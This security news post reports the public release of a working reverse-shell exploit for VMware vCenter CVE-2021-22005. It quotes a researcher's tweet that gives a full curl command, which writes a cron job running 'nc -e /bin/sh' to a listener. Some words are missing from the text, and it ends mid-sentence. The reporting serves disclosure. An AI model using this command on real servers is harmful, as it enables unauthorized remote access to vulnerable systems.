A Working Exploit for the CVE-2021-22005 Flaw in VMware vCenter Was Publicly Released

A working for the Remote Code Execution () vulnerability in vCenter tracked as CVE--22005 has been publicly released. According to security experts, the bug is already exploited by hackers.

A Different Exploit

The exploit, released this week by a security expert at Rapid7, differs from the PoC exploit that began to circulate last week. This version can be used to open a reverse shell on an exposed server, enabling a threat actor to perform arbitrary code.

According to experts, the RCE enables an unauthenticated, remote attacker to upload files to the vCenter Server analytics service.

Complete Exploit in Reserve

The Rapid7 expert said in a tweet that the PoC exploit for CVE-2021-22005 works against endpoints in servers that have the Customer Experience Improvement Program (CEIP) component enabled.

CVE-2021-22005: Exploitation in the wild confirmed. Unredacted RCE PoC against CEIP below.

curl -kv “https://172.16.57.2/analytics/telemetry/ph/api/hyper/send?_c=&_i=/../../../../../../etc/cron.d/$RANDOM” -H Content-Type: -d “* * * * * root nc -e /bin/sh 172.16.57.1 4444” https://t.co/wi08brjl3r pic.twitter.com/bwjMA21ifA

— wvu (@wvuuuuuuuuuuuuu) September 27, 2021

This vulnerability can be used by anyone who can reach vCenter Server over the to gain access, regardless of the configuration settings of vCenter Server.

Source

As mentioned by BleepingComputer, the

Read More: https://heimdalsecurity.com/blog/a-working-exploit-for-the-cve-2021-22005-flaw-in-vmware-vcenter-was-publicly-released/